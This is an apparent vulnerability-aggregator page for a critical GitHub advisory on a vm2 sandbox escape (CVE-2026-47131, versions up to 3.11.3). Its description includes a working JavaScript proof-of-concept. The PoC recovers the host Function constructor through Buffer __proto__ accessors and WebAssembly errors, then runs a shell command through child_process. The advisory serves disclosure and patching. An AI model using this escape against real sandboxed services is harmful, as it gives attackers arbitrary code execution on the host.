What is GHSA-v6mx-mf47-r5wg?

GHSA-v6mx-mf47-r5wg is a security advisory published by GitHub Security Advisories with Critical severity. vm2 has a Sandbox Escape issue

Which CVE IDs does GHSA-v6mx-mf47-r5wg cover?

GHSA-v6mx-mf47-r5wg covers the following CVE IDs: CVE-2026-47131. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-v6mx-mf47-r5wg?

GHSA-v6mx-mf47-r5wg has a CVSS v3 base score of 10.0, published by GitHub Security Advisories.

Which products are affected by GHSA-v6mx-mf47-r5wg?

GHSA-v6mx-mf47-r5wg affects 1 product, including: npm/vm2:\u003c= 3.11.3.

GHSA-v6mx-mf47-r5wgCriticalCVSS 10.0

vm2 has a Sandbox Escape issue

Vendor

GitHub Security Advisories

Published

May 29, 2026

Last Modified

May 29, 2026

🔗 CVE IDs covered (1)

CVE-2026-47131 →

📋 Description

Summary

By combining Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"), Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js's ERR_INVALID_ARG_TYPE Error, the host's TypeError constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code.

PoC

"use strict";

const { VM } = require("vm2");
const vm = new VM();

vm.run(`
  "use strict";

  const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
  const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");

  async function f() {
    try {
      await WebAssembly.compileStreaming();
    } catch(e) {
      setProto.call(getProto.call(e), null);
    }

    try {
      await WebAssembly.compileStreaming();
    } catch(e) {
      const HostFunction = e.constructor.constructor;
      new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
    }
  }

  f();
`);

vm2 has a Sandbox Escape issue

🔗 CVE IDs covered (1)

📋 Description

Summary

PoC

Impact

🎯 Affected products1

🔗 References (4)